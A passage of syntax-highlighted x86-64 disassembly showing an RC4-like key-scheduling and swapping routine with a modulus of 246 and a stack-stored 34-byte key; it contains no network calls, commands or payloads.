<span class="hljs-symbol">  c4:</span>   c7 <span class="hljs-number">45</span> 8b <span class="hljs-number">43</span> <span class="hljs-number">52</span> <span class="hljs-number">7d</span> e5    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x75</span>],<span class="hljs-number">0xe57d5243</span>
<span class="hljs-symbol">  cb:</span>   c6 <span class="hljs-number">45</span> 8f <span class="hljs-number">00</span>             <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">BYTE</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x71</span>],<span class="hljs-number">0x0</span>
<span class="hljs-symbol">  cf:</span>   c7 <span class="hljs-number">85</span> <span class="hljs-number">80</span> fb ff ff <span class="hljs-number">22</span>    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x480</span>],<span class="hljs-number">0x22</span>
<span class="hljs-symbol">  d6:</span>   <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> 
<span class="hljs-symbol">  d9:</span>   c7 <span class="hljs-number">85</span> <span class="hljs-number">70</span> fb ff ff <span class="hljs-number">00</span>    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x490</span>],<span class="hljs-number">0x0</span>
<span class="hljs-symbol">  e0:</span>   <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> 
<span class="hljs-symbol">  e3:</span>   c7 <span class="hljs-number">85</span> <span class="hljs-number">74</span> fb ff ff <span class="hljs-number">00</span>    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x48c</span>],<span class="hljs-number">0x0</span>
<span class="hljs-symbol">  ea:</span>   <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> 
<span class="hljs-symbol">  ed:</span>   c7 <span class="hljs-number">85</span> <span class="hljs-number">78</span> fb ff ff <span class="hljs-number">01</span>    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x488</span>],<span class="hljs-number">0x1</span>
<span class="hljs-symbol">  f4:</span>   <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> 
<span class="hljs-symbol">  f7:</span>   c7 <span class="hljs-number">85</span> <span class="hljs-number">70</span> fb ff ff <span class="hljs-number">00</span>    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x490</span>],<span class="hljs-number">0x0</span>
<span class="hljs-symbol">  fe:</span>   <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> 
 <span class="hljs-number">101</span>:   eb 1c                   <span class="hljs-keyword">jmp</span>    <span class="hljs-number">0x11f</span>
 <span class="hljs-number">103</span>:   8b <span class="hljs-number">85</span> <span class="hljs-number">70</span> fb ff ff       <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x490</span>]
 <span class="hljs-number">109</span>:   <span class="hljs-number">48</span> <span class="hljs-number">98</span>                   <span class="hljs-keyword">cdqe</span>   
 <span class="hljs-number">10b</span>:   8b <span class="hljs-number">95</span> <span class="hljs-number">70</span> fb ff ff       <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">edx</span>,<span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x490</span>]
 <span class="hljs-number">111</span>:   <span class="hljs-number">89</span> <span class="hljs-number">94</span> <span class="hljs-number">85</span> <span class="hljs-number">90</span> fb ff ff    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>+<span class="hljs-built_in">rax</span>*<span class="hljs-number">4</span>-<span class="hljs-number">0x470</span>],<span class="hljs-built_in">edx</span>
 <span class="hljs-number">118</span>:   <span class="hljs-number">83</span> <span class="hljs-number">85</span> <span class="hljs-number">70</span> fb ff ff <span class="hljs-number">01</span>    <span class="hljs-keyword">add</span>    <span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x490</span>],<span class="hljs-number">0x1</span>
 11f:   <span class="hljs-number">81</span> bd <span class="hljs-number">70</span> fb ff ff f5    <span class="hljs-keyword">cmp</span>    <span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x490</span>],<span class="hljs-number">0xf5</span>
 <span class="hljs-number">126</span>:   <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> 
 <span class="hljs-number">129</span>:   7e d8                   <span class="hljs-keyword">jle</span>    <span class="hljs-number">0x103</span>
 12b:   c7 <span class="hljs-number">85</span> <span class="hljs-number">70</span> fb ff ff <span class="hljs-number">00</span>    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x490</span>],<span class="hljs-number">0x0</span>
 <span class="hljs-number">132</span>:   <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> 
 <span class="hljs-number">135</span>:   e9 b3 <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span>          <span class="hljs-keyword">jmp</span>    <span class="hljs-number">0x1ed</span>
 13a:   8b <span class="hljs-number">85</span> <span class="hljs-number">70</span> fb ff ff       <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x490</span>]
 <span class="hljs-number">140</span>:   <span class="hljs-number">48</span> <span class="hljs-number">98</span>                   <span class="hljs-keyword">cdqe</span>   
 <span class="hljs-number">142</span>:   8b <span class="hljs-number">94</span> <span class="hljs-number">85</span> <span class="hljs-number">90</span> fb ff ff    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">edx</span>,<span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>+<span class="hljs-built_in">rax</span>*<span class="hljs-number">4</span>-<span class="hljs-number">0x470</span>]
 <span class="hljs-number">149</span>:   8b <span class="hljs-number">85</span> <span class="hljs-number">74</span> fb ff ff       <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x48c</span>]
 14f:   <span class="hljs-number">8d</span> 0c <span class="hljs-number">02</span>                <span class="hljs-keyword">lea</span>    <span class="hljs-built_in">ecx</span>,[<span class="hljs-built_in">rdx</span>+<span class="hljs-built_in">rax</span>*<span class="hljs-number">1</span>]
 <span class="hljs-number">152</span>:   8b <span class="hljs-number">85</span> <span class="hljs-number">70</span> fb ff ff       <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x490</span>]
 <span class="hljs-number">158</span>:   <span class="hljs-number">99</span>                      <span class="hljs-keyword">cdq</span>    
 <span class="hljs-number">159</span>:   f7 bd <span class="hljs-number">80</span> fb ff ff       <span class="hljs-keyword">idiv</span>   <span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x480</span>]
 15f:   <span class="hljs-number">89</span> d0                   <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">edx</span>
 <span class="hljs-number">161</span>:   <span class="hljs-number">48</span> <span class="hljs-number">98</span>                   <span class="hljs-keyword">cdqe</span>   
 <span class="hljs-number">163</span>:   0f b6 <span class="hljs-number">44</span> <span class="hljs-number">05</span> <span class="hljs-number">90</span>          <span class="hljs-keyword">movzx</span>  <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">BYTE</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>+<span class="hljs-built_in">rax</span>*<span class="hljs-number">1</span>-<span class="hljs-number">0x70</span>]
 <span class="hljs-number">168</span>:   0f b6 c0                <span class="hljs-keyword">movzx</span>  <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">al</span>
 16b:   <span class="hljs-number">01</span> c1                   <span class="hljs-keyword">add</span>    <span class="hljs-built_in">ecx</span>,<span class="hljs-built_in">eax</span>
 <span class="hljs-number">16d</span>:   ba <span class="hljs-number">15</span> <span class="hljs-number">02</span> <span class="hljs-number">4d</span> <span class="hljs-number">21</span>          <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">edx</span>,<span class="hljs-number">0x214d0215</span>
 <span class="hljs-number">172</span>:   <span class="hljs-number">89</span> c8                   <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">ecx</span>
 <span class="hljs-number">174</span>:   f7 ea                   <span class="hljs-keyword">imul</span>   <span class="hljs-built_in">edx</span>
 <span class="hljs-number">176</span>:   c1 fa <span class="hljs-number">05</span>                <span class="hljs-keyword">sar</span>    <span class="hljs-built_in">edx</span>,<span class="hljs-number">0x5</span>
 <span class="hljs-number">179</span>:   <span class="hljs-number">89</span> c8                   <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">ecx</span>
 17b:   c1 f8 1f                <span class="hljs-keyword">sar</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-number">0x1f</span>
 17e:   <span class="hljs-number">29</span> c2                   <span class="hljs-keyword">sub</span>    <span class="hljs-built_in">edx</span>,<span class="hljs-built_in">eax</span>
 <span class="hljs-number">180</span>:   <span class="hljs-number">89</span> d0                   <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">edx</span>
 <span class="hljs-number">182</span>:   <span class="hljs-number">89</span> <span class="hljs-number">85</span> <span class="hljs-number">74</span> fb ff ff       <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x48c</span>],<span class="hljs-built_in">eax</span>
 <span class="hljs-number">188</span>:   8b <span class="hljs-number">85</span> <span class="hljs-number">74</span> fb ff ff       <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x48c</span>]
 18e:   <span class="hljs-number">69</span> c0 f6 <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span>       <span class="hljs-keyword">imul</span>   <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">eax</span>,<span class="hljs-number">0xf6</span>
 <span class="hljs-number">194</span>:   <span class="hljs-number">29</span> c1                   <span class="hljs-keyword">sub</span>    <span class="hljs-built_in">ecx</span>,<span class="hljs-built_in">eax</span>
 <span class="hljs-number">196</span>:   <span class="hljs-number">89</span> c8                   <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">ecx</span>
 <span class="hljs-number">198</span>:   <span class="hljs-number">89</span> <span class="hljs-number">85</span> <span class="hljs-number">74</span> fb ff ff       <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x48c</span>],<span class="hljs-built_in">eax</span>
 19e:   8b <span class="hljs-number">85</span> <span class="hljs-number">70</span> fb ff ff       <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x490</span>]
 1a4:   <span class="hljs-number">48</span> <span class="hljs-number">98</span>                   <span class="hljs-keyword">cdqe</span>   
 1a6:   8b <span class="hljs-number">84</span> <span class="hljs-number">85</span> <span class="hljs-number">90</span> fb ff ff    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>+<span class="hljs-built_in">rax</span>*<span class="hljs-number">4</span>-<span class="hljs-number">0x470</span>]
 1ad:   <span class="hljs-number">89</span> <span class="hljs-number">85</span> 8c fb ff ff       <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x474</span>],<span class="hljs-built_in">eax</span>
 1b3:   8b <span class="hljs-number">85</span> <span class="hljs-number">74</span> fb ff ff       <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x48c</span>]
 1b9:   <span class="hljs-number">48</span> <span class="hljs-number">98</span>                   <span class="hljs-keyword">cdqe</span>   
 1bb:   8b <span class="hljs-number">94</span> <span class="hljs-number">85</span> <span class="hljs-number">90</span> fb ff ff    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">edx</span>,<span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>+<span class="hljs-built_in">rax</span>*<span class="hljs-number">4</span>-<span class="hljs-number">0x470</span>]
 1c2:   8b <span class="hljs-number">85</span> <span class="hljs-number">70</span> fb ff ff       <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x490</span>]
 1c8:   <span class="hljs-number">48</span> <span class="hljs-number">98</span>                   <span class="hljs-keyword">cdqe</span>   
 1ca:   <span class="hljs-number">89</span> <span class="hljs-number">94</span> <span class="hljs-number">85</span> <span class="hljs-number">90</span> fb ff ff    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>+<span class="hljs-built_in">rax</span>*<span class="hljs-number">4</span>-<span class="hljs-number">0x470</span>],<span class="hljs-built_in">edx</span>
 1d1:   8b <span class="hljs-number">85</span> <span class="hljs-number">74</span> fb ff ff       <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x48c</span>]
 1d7:   <span class="hljs-number">48</span> <span class="hljs-number">98</span>                   <span class="hljs-keyword">cdqe</span>   
 1d9:   8b <span class="hljs-number">95</span> 8c fb ff ff       <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">edx</span>,<span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x474</span>]
 1df:   <span class="hljs-number">89</span> <span class="hljs-number">94</span> <span class="hljs-number">85</span> <span class="hljs-number">90</span> fb ff ff    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>+<span class="hljs-built_in">rax</span>*<span class="hljs-number">4</span>-<span class="hljs-number">0x470</span>],<span class="hljs-built_in">edx</span>
 1e6:   <span class="hljs-number">83</span> <span class="hljs-number">85</span> <span class="hljs-number">70</span> fb ff ff <span class="hljs-number">01</span>    <span class="hljs-keyword">add</span>    <span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x490</span>],<span class="hljs-number">0x1</span>
 1ed:   <span class="hljs-number">81</span> bd <span class="hljs-number">70</span> fb ff ff f5    <span class="hljs-keyword">cmp</span>    <span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x490</span>],<span class="hljs-number">0xf5</span>
 1f4:   <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> 
 1f7:   0f 8e <span class="hljs-number">3d</span> ff ff ff       <span class="hljs-keyword">jle</span>    <span class="hljs-number">0x13a</span>
 1fd:   c7 <span class="hljs-number">85</span> 7c fb ff ff <span class="hljs-number">00</span>    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x484</span>],<span class="hljs-number">0x0</span>
 <span class="hljs-number">204</span>:   <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> 
 <span class="hljs-number">207</span>:   c7 <span class="hljs-number">85</span> <span class="hljs-number">70</span> fb ff ff <span class="hljs-number">00</span>    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x490</span>],<span class="hljs-number">0x0</span>
 20e:   <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> 
 <span class="hljs-number">211</span>:   c7 <span class="hljs-number">85</span> <span class="hljs-number">74</span> fb ff ff <span class="hljs-number">00</span>    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x48c</span>],<span class="hljs-number">0x0</span>
 <span class="hljs-number">218</span>:   <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> 
 21b:   e9 4f <span class="hljs-number">01</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span>          <span class="hljs-keyword">jmp</span>    <span class="hljs-number">0x36f</span>
 <span class="hljs-number">220</span>:   8b <span class="hljs-number">85</span> <span class="hljs-number">70</span> fb ff ff       <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x490</span>]
 <span class="hljs-number">226</span>:   <span class="hljs-number">8d</span> <span class="hljs-number">48</span> <span class="hljs-number">01</span>                <span class="hljs-keyword">lea</span>    <span class="hljs-built_in">ecx</span>,[<span class="hljs-built_in">rax</span>+<span class="hljs-number">0x1</span>]
 <span class="hljs-number">229</span>:   ba <span class="hljs-number">15</span> <span class="hljs-number">02</span> <span class="hljs-number">4d</span> <span class="hljs-number">21</span>          <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">edx</span>,<span class="hljs-number">0x214d0215</span>
 22e:   <span class="hljs-number">89</span> c8                   <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">ecx</span>
 <span class="hljs-number">230</span>:   f7 ea                   <span class="hljs-keyword">imul</span>   <span class="hljs-built_in">edx</span>
 <span class="hljs-number">232</span>:   c1 fa <span class="hljs-number">05</span>                <span class="hljs-keyword">sar</span>    <span class="hljs-built_in">edx</span>,<span class="hljs-number">0x5</span>
 <span class="hljs-number">235</span>:   <span class="hljs-number">89</span> c8                   <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">ecx</span>
 <span class="hljs-number">237</span>:   c1 f8 1f                <span class="hljs-keyword">sar</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-number">0x1f</span>
 23a:   <span class="hljs-number">29</span> c2                   <span class="hljs-keyword">sub</span>    <span class="hljs-built_in">edx</span>,<span class="hljs-built_in">eax</span>
 23c:   <span class="hljs-number">89</span> d0                   <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">edx</span>
 23e:   <span class="hljs-number">89</span> <span class="hljs-number">85</span> <span class="hljs-number">70</span> fb ff ff       <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x490</span>],<span class="hljs-built_in">eax</span>
 <span class="hljs-number">244</span>:   8b <span class="hljs-number">85</span> <span class="hljs-number">70</span> fb ff ff       <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x490</span>]
 24a:   <span class="hljs-number">69</span> c0 f6 <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span>       <span class="hljs-keyword">imul</span>   <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">eax</span>,<span class="hljs-number">0xf6</span>
 <span class="hljs-number">250</span>:   <span class="hljs-number">29</span> c1                   <span class="hljs-keyword">sub</span>    <span class="hljs-built_in">ecx</span>,<span class="hljs-built_in">eax</span>
 <span class="hljs-number">252</span>:   <span class="hljs-number">89</span> c8                   <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">ecx</span>
 <span class="hljs-number">254</span>:   <span class="hljs-number">89</span> <span class="hljs-number">85</span> <span class="hljs-number">70</span> fb ff ff       <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x490</span>],<span class="hljs-built_in">eax</span>
 25a:   8b <span class="hljs-number">85</span> <span class="hljs-number">70</span> fb ff ff       <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x490</span>]
 <span class="hljs-number">260</span>:   <span class="hljs-number">48</span> <span class="hljs-number">98</span>                   <span class="hljs-keyword">cdqe</span>   
 <span class="hljs-number">262</span>:   8b <span class="hljs-number">94</span> <span class="hljs-number">85</span> <span class="hljs-number">90</span> fb ff ff    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">edx</span>,<span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>+<span class="hljs-built_in">rax</span>*<span class="hljs-number">4</span>-<span class="hljs-number">0x470</span>]
 <span class="hljs-number">269</span>:   8b <span class="hljs-number">85</span> <span class="hljs-number">74</span> fb ff ff       <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x48c</span>]
 26f:   <span class="hljs-number">8d</span> 0c <span class="hljs-number">02</span>                <span class="hljs-keyword">lea</span>    <span class="hljs-built_in">ecx</span>,[<span class="hljs-built_in">rdx</span>+<span class="hljs-built_in">rax</span>*<span class="hljs-number">1</span>]
 <span class="hljs-number">272</span>:   ba <span class="hljs-number">15</span> <span class="hljs-number">02</span> <span class="hljs-number">4d</span> <span class="hljs-number">21</span>          <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">edx</span>,<span class="hljs-number">0x214d0215</span>
 <span class="hljs-number">277</span>:   <span class="hljs-number">89</span> c8                   <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">ecx</span>
 <span class="hljs-number">279</span>:   f7 ea                   <span class="hljs-keyword">imul</span>   <span class="hljs-built_in">edx</span>
 27b:   c1 fa <span class="hljs-number">05</span>                <span class="hljs-keyword">sar</span>    <span class="hljs-built_in">edx</span>,<span class="hljs-number">0x5</span>
 27e:   <span class="hljs-number">89</span> c8                   <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">ecx</span>
 <span class="hljs-number">280</span>:   c1 f8 1f                <span class="hljs-keyword">sar</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-number">0x1f</span>
 <span class="hljs-number">283</span>:   <span class="hljs-number">29</span> c2                   <span class="hljs-keyword">sub</span>    <span class="hljs-built_in">edx</span>,<span class="hljs-built_in">eax</span>
 <span class="hljs-number">285</span>:   <span class="hljs-number">89</span> d0                   <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">edx</span>
 <span class="hljs-number">287</span>:   <span class="hljs-number">89</span> <span class="hljs-number">85</span> <span class="hljs-number">74</span> fb ff ff       <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x48c</span>],<span class="hljs-built_in">eax</span>
 <span class="hljs-number">28d</span>:   8b <span class="hljs-number">85</span> <span class="hljs-number">74</span> fb ff ff       <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x48c</span>]
 <span class="hljs-number">293</span>:   <span class="hljs-number">69</span> c0 f6 <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span>       <span class="hljs-keyword">imul</span>   <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">eax</span>,<span class="hljs-number">0xf6</span>
 <span class="hljs-number">299</span>:   <span class="hljs-number">29</span> c1                   <span class="hljs-keyword">sub</span>    <span class="hljs-built_in">ecx</span>,<span class="hljs-built_in">eax</span>
 29b:   <span class="hljs-number">89</span> c8                   <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">ecx</span>
 <span class="hljs-number">29d</span>:   <span class="hljs-number">89</span> <span class="hljs-number">85</span> <span class="hljs-number">74</span> fb ff ff       <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x48c</span>],<span class="hljs-built_in">eax</span>
 2a3:   8b <span class="hljs-number">85</span> <span class="hljs-number">70</span> fb ff ff       <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x490</span>]
 2a9:   <span class="hljs-number">48</span> <span class="hljs-number">98</span>                   <span class="hljs-keyword">cdqe</span>   
 2ab:   8b <span class="hljs-number">84</span> <span class="hljs-number">85</span> <span class="hljs-number">90</span> fb ff ff    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>+<span class="hljs-built_in">rax</span>*<span class="hljs-number">4</span>-<span class="hljs-number">0x470</span>]
 2b2:   <span class="hljs-number">89</span> <span class="hljs-number">85</span> <span class="hljs-number">84</span> fb ff ff       <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x47c</span>],<span class="hljs-built_in">eax</span>
 2b8:   8b <span class="hljs-number">85</span> <span class="hljs-number">74</span> fb ff ff       <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x48c</span>]
 2be:   <span class="hljs-number">48</span> <span class="hljs-number">98</span>                   <span class="hljs-keyword">cdqe</span>   
 2c0:   8b <span class="hljs-number">94</span> <span class="hljs-number">85</span> <span class="hljs-number">90</span> fb ff ff    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">edx</span>,<span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>+<span class="hljs-built_in">rax</span>*<span class="hljs-number">4</span>-<span class="hljs-number">0x470</span>]
 2c7:   8b <span class="hljs-number">85</span> <span class="hljs-number">70</span> fb ff ff       <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x490</span>]
 2cd:   <span class="hljs-number">48</span> <span class="hljs-number">98</span>                   <span class="hljs-keyword">cdqe</span>   
 2cf:   <span class="hljs-number">89</span> <span class="hljs-number">94</span> <span class="hljs-number">85</span> <span class="hljs-number">90</span> fb ff ff    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>+<span class="hljs-built_in">rax</span>*<span class="hljs-number">4</span>-<span class="hljs-number">0x470</span>],<span class="hljs-built_in">edx</span>
